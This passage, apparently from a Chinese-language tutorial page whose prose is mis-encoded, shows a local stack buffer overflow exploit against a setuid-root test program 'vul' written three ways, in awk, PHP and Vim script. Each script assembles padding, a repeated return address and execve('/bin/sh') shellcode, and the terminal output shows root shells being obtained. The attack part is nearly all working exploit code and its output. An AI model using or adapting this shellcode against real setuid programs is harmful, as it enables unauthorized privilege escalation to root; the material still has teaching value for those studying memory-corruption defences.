AA="AA"
        for(i=0;i<4;i++)
        {
          AA=AA"A"
          system("./vul "AA""AD" "AG""SH)
        }
}
#EOF
[cloud@test]$ gawk -f ex.awk /dev/null
buff : AAAèóÿ¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è??
buff : AAAAèóÿ¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è??
sh-2.05b# id
uid=0(root) gid=503(test) groups=503(test)
sh-2.05b#

<Áù> PHP°æ±¾

[cloud@MagicLinux tmp]$ id
uid=502(cloud) gid=502(cloud) groups=502(cloud)
[cloud@MagicLinux tmp]$ ls -l vul
-rwsr-xr-x  1 root root 4895  2ÔÂ 26 20:57 vul
[cloud@MagicLinux tmp]$ cat ex.php
<?php
$SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
$AG="AA";
for( $i=0;$i<10;$i++){
        $AG.=$AG;
}
$AG.=$AG.$AG; #3096

for($i=0;$i<20;$i++) {
        $AD.="\xff\xbf\xe8\xf3";#ADDR:0xbffff3e8
}
for($i=0;$i<4;$i++) {
  $AA.="A";
  print system("./vul ".$AA.$AD.$AG.$SH);
}
?>
[cloud@MagicLinux tmp]$ php ex.php 1>/dev/null
id >&2
uid=0(root) gid=502(cloud) groups=502(cloud)
exit
[cloud@MagicLinux tmp]$

<Æß> VimÀ©Õ¹½Å±¾°æ±¾
Á¬vim±à¼­Æ÷µÄÀ©Õ¹±à³Ì½Å±¾Ò²¿ÉÒÔÄÃÀ´Ð´Òç³öµÄ˵£º

[cloud@MagicLinux tmp]$ id
uid=502(cloud) gid=502(cloud) groups=502(cloud)
[cloud@MagicLinux tmp]$ cat ex.vim
let SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80"
let AG="AA"
let i=0
while(i<10)
        let AG=AG.AG
        let i=i+1
endwhile
let AG=AG.AG.AG
"len of AG is 3096

let AD=""
let i=0
while(i<20)
        let AD=AD."\xff\xbf\xe8\xf3"
"ADDR:0xbffff3e8
        let i=i+1
endwhile

let AA=""
let i=0
while(i<4)
  let AA=AA."A"
  execute "!./vul ". AA . AD . AG . SH
  let i=i+1
endwhile
[cloud@MagicLinux tmp]$ ls -l vul
-rwsr-xr-x  1 root root 4895  2ÔÂ 26 20:57 vul
[cloud@MagicLinux tmp]$ vim -eS ex.vim
Xlib: connection to ":0.0" refused by server
Xlib: No protocol specified

ÉÏÒ»Ò³  [1] [2] [3] [4] ÏÂÒ»Ò³